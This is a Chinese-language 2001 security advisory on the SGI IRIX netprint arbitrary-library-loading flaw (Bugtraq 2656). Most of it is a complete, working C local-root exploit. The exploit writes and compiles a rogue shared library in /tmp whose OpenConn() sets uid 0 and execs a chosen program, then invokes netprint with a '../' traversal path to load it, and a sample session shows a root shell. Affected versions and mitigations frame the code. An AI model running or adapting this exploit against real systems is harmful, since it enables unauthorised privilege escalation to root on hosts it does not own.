IRIX 'netprint' 打开任意动态链接库漏洞

日期:2001-05-15

受影响的系统:  
    SGI IRIX 6.5.9
    SGI IRIX 6.5.8
    SGI IRIX 6.5.7
    SGI IRIX 6.5.6
    SGI IRIX 6.5.5
    SGI IRIX 6.5.4
    SGI IRIX 6.5.3
    SGI IRIX 6.5.2
    SGI IRIX 6.5.10
    SGI IRIX 6.5.1
    SGI IRIX 6.5
    SGI IRIX 6.4
    SGI IRIX 6.3
    SGI IRIX 6.2
    SGI IRIX 6.1
    SGI IRIX 6.0.1
    SGI IRIX 6.0
    SGI IRIX 5.3

不受影响系统:  
SGI IRIX 6.5.11

描述:
--------------------------------------------------------------------------------


BUGTRAQ ID: 2656

SGI Irix系统携带的netprint工具用于向远程主机提交打印任务,缺省安装后它是
setuid-to-root的。netprint从命令行上接收-n选项指定的网络类型,根据-n后面的
参数串打开相应的动态链接库。但是netprint没有对这个参数串做任何检查(例如拒绝含有"../"的路径),攻击者可以通过路径遍历让netprint加载自己放在/tmp等可写目录中的动态链接库。由于netprint本身是setuid-to-root的,攻击者提供的代码
将以root身份运行。尽管只有lp用户可以执行netprint,但在许多早期版本的Irix中,
lp是无口令的默认帐号。如果lp帐号未被禁用,远程攻击者可以以lp身份登录进入系
统,利用netprint的漏洞获取root权限。

<* 来源:Vade79 (v9@realhalo.org) *>



测试程序:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!



/* (IRIX)netprint[] local root exploit, by: v9[v9@fakehalo.org].  this will
   give you uid=0 on IRIX systems.  this exploit simply takes advantage of
   netprint's -n option to execute arbitrary code and gain elevated
privileges.

   example:
----------------------------------------------------------------------------
$ cc xnetprint.c -o xnetprint
$ id
uid=9(lp) gid=9(lp)
$ ./xnetprint /bin/sh
[(IRIX)netprint[] local root exploit, by: v9[v9@realhalo.org]. ]
[*] making symbols source file for netprint to execute.
[*] done, now compiling symbols source file.
[*] done, now checking to see if the symbols source compiled.
[*] done, now executing netprint.
[*] success, uid: 0, euid: 0, gid: 0, egid: 0.
# id
uid=0(root) gid=0(sys)
#
----------------------------------------------------------------------------

   note: built and tested on IRIX 6.2.  this often requires the uid of lp
         to work correctly.  though, should prove effective up to 6.4 or
         higher.
*/
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>
/* Fixed paths used by the exploit.  SRCFILE and SOFILE live in the shared
 * /tmp under predictable names: another local user who pre-creates them (or a
 * symlink in their place) could have netprint load a library of *their*
 * choosing as root, so this should only be run on a host where that is an
 * acceptable risk. */
#define PATH "/usr/lib/print/netprint" /* path to exploitable program. */
#define CCPATH "/usr/bin/cc" /* path to compiler. */
/* "xnetrpintso" (transposed letters) is the original spelling; the macro is
 * used consistently, so the typo is harmless. */
#define SRCFILE "/tmp/xnetrpintso.c" /* path to temporary symbols source. */
#define SOFILE "/tmp/xnetprintso.so" /* path to compile as. */
/* Value handed to netprint's -n option.  The "../" run walks out of
 * whatever directory netprint resolves network-type libraries in, up to /tmp.
 * netprint presumably appends ".so" itself, since SOFILE carries the suffix
 * and this value does not -- inferred from the two macros, not confirmed here. */
#define FAKESOFILE "../../../../tmp/xnetprintso" /* arg to feed netprint. */
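/*
 * Remove the temporary payload source and shared object, then exit with
 * status i when i is non-zero (i == 0 means "just tidy up and return").
 *
 * unlink() is called unconditionally: the original access()-then-unlink()
 * pair only added a window in which the file could be swapped between the
 * two calls, and unlink() on a missing file simply fails harmlessly.
 */
void cleanup(unsigned short i){
unlink(SRCFILE);
unlink(SOFILE);
if(i)
  exit(i);
}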
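/*
 * Check that target can be pasted into a C string literal in the generated
 * payload source.  A '"' or '\' in the path would break the literal and the
 * compile step would fail with a confusing cc error.
 * Returns 1 if target is safe to embed, 0 otherwise.
 */
static int embeddable_path(const char *target){
return strchr(target,'"')==NULL&&strchr(target,'\\')==NULL;
}

/*
 * Write the source of the fake network-type library that netprint will load
 * via "-n".  OpenConn() is the entry point this exploit expects netprint to
 * call: it raises uid/gid to 0 and execs target.  The remaining functions
 * are empty stubs so that every symbol netprint resolves is present.
 *
 * The file is created with O_EXCL (cleanup() removed any leftover just
 * before), so a symlink pre-planted at SRCFILE by another local user cannot
 * redirect the write.
 * Returns 0 on success, -1 on failure (an error line has been printed).
 */
static int write_payload_source(const char *target){
int fd;
FILE *symbol;
fd=open(SRCFILE,O_WRONLY|O_CREAT|O_EXCL,0600);
if(fd<0){
  printf("[!] failed, could not open temporary file to write to.\n");
  return -1;
}
if(!(symbol=fdopen(fd,"w"))){
  printf("[!] failed, could not open temporary file to write to.\n");
  close(fd);
  return -1;
}
/* The generated unit is compiled on its own, so declare what it uses. */
fprintf(symbol,"#include <stdio.h>\n");
fprintf(symbol,"#include <unistd.h>\n");
fprintf(symbol,"void OpenConn(){\n");
fprintf(symbol," seteuid(0);\n");
fprintf(symbol," setuid(0);\n");
fprintf(symbol," setegid(0);\n");
fprintf(symbol," setgid(0);\n");
/* "%%u" here becomes "%u" in the generated source. */
fprintf(symbol," printf(\"[*] success, uid: %%u, euid: %%u, gid: %%u, egid: "
  "%%u.\\n\",getuid(),geteuid(),getgid(),getegid());\n");
fprintf(symbol," execl(\"%s\",\"%s\",(char *)0);\n",target,target);
fprintf(symbol,"}\n");
fprintf(symbol,"void CloseConn(){}\n");
fprintf(symbol,"void ListPrinters(){}\n");
fprintf(symbol,"void SendJob(){}\n");
fprintf(symbol,"void CancelJob(){}\n");
fprintf(symbol,"void WaitForJob(){}\n");
fprintf(symbol,"void GetQueue(){}\n");
fprintf(symbol,"void StartTagging(){}\n");
fprintf(symbol,"void StopTagging(){}\n");
fprintf(symbol,"void Install(){}\n");
fprintf(symbol,"void IsDest(){}\n");
/* fclose() flushes; a short write (e.g. full /tmp) surfaces here. */
if(fclose(symbol)){
  printf("[!] failed, could not write temporary file.\n");
  return -1;
}
return 0;
}

/*
 * Compile SRCFILE into the shared object SOFILE with CCPATH.  The command
 * line is built from compile-time string constants only, so system() never
 * sees user-controlled text.
 * Returns 0 when cc exited successfully, -1 otherwise.
 */
static int compile_payload(void){
/* Three string-literal macros (each sizeof includes a NUL) plus the 13
 * characters of " " and " -shared -o " plus a terminator; 16 leaves slack. */
char syscmd[sizeof(CCPATH)+sizeof(SRCFILE)+sizeof(SOFILE)+16];
int n;
n=snprintf(syscmd,sizeof syscmd,"%s %s -shared -o %s",CCPATH,SRCFILE,SOFILE);
if(n<0||(size_t)n>=sizeof syscmd){
  printf("[!] failed, compiler command line is too long.\n");
  return -1;
}
if(system(syscmd)!=0){
  printf("[!] failed, symbols source was not compiled properly.\n");
  return -1;
}
return 0;
}

/*
 * Entry point.  argv[1] is the program to run as root once netprint has
 * loaded our library.
 *
 * Order of work: sanity checks (netprint is setuid root, the target and cc
 * are executable), write the payload source, compile it, verify the result
 * is our own regular file, then exec netprint with "-n" pointing (via the
 * "../" traversal in FAKESOFILE) at the shared object in /tmp.  On success
 * the process image is replaced and this function never returns; every
 * failure path goes through cleanup(1), which exits.
 */
int main(int argc,char **argv){
struct stat mod;
printf("[(IRIX)netprint[] local root exploit, by: v9[v9@realhalo.org]. ]\n");
if(argc<2){
  printf("[!] syntax: %s </path/to/program/to/exec>\n",argv[0]);
  cleanup(1);
}
if(stat(PATH,&mod)){
  printf("[!] failed, could not get stats on %s.\n",PATH);
  cleanup(1);
}
/* Owner must be uid 0 and the setuid bit must be set. */
if(mod.st_uid||!(S_ISUID&mod.st_mode)){
  printf("[!] failed, %s is not setuid root.\n",PATH);
  cleanup(1);
}
if(access(argv[1],X_OK)){
  printf("[!] failed, %s doesn't seem to exist or is not executable.\n",
  argv[1]);
  cleanup(1);
}
if(!embeddable_path(argv[1])){
  printf("[!] failed, %s contains '\"' or '\\' and cannot be embedded.\n",
  argv[1]);
  cleanup(1);
}
if(access(CCPATH,X_OK)){
  printf("[!] failed, %s compiler doesn't seem to exist or is not executable."
  "\n",CCPATH);
  cleanup(1);
}
printf("[*] making symbols source file for netprint to execute.\n");
/* Remove stale copies so the O_EXCL create in write_payload_source() succeeds. */
cleanup(0);
if(write_payload_source(argv[1]))
  cleanup(1);
printf("[*] done, now compiling symbols source file.\n");
if(compile_payload())
  cleanup(1);
printf("[*] done, now checking to see if the symbols source compiled.\n");
/* lstat(), not access(): refuse a symlink or a file some other user dropped
 * at SOFILE between cleanup(0) and the compile.  cc itself follows symlinks
 * when writing, so this narrows the race rather than removing it. */
if(lstat(SOFILE,&mod)||!S_ISREG(mod.st_mode)||mod.st_uid!=getuid()){
  printf("[!] failed, symbols source was not compiled properly.\n");
  cleanup(1);
}
printf("[*] done, now executing netprint.\n");
/* execl() only returns on failure.  The argument list terminator must be a
 * null pointer, not the int 0 -- on ILP32 they coincide, on LP64 they do not. */
execl(PATH,PATH,"-n",FAKESOFILE,"-h0","-p0","0-0",(char *)0);
printf("[!] failed, %s did not execute properly.\n",PATH);
cleanup(1);
return 1;
}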


--------------------------------------------------------------------------------
建议:

    一个临时解决方案是"chmod u-s netprint"(即去掉/usr/lib/print/netprint的setuid位),
    但是这可能影响打印子系统的某些功能。此外应为lp帐号设置口令或直接禁用该帐号,
    并限制其远程登录,以免远程攻击者借此取得本地执行权限后再利用本漏洞。
    SGI即将提供安全补丁;IRIX 6.5.11不受此漏洞影响,可升级到该版本。

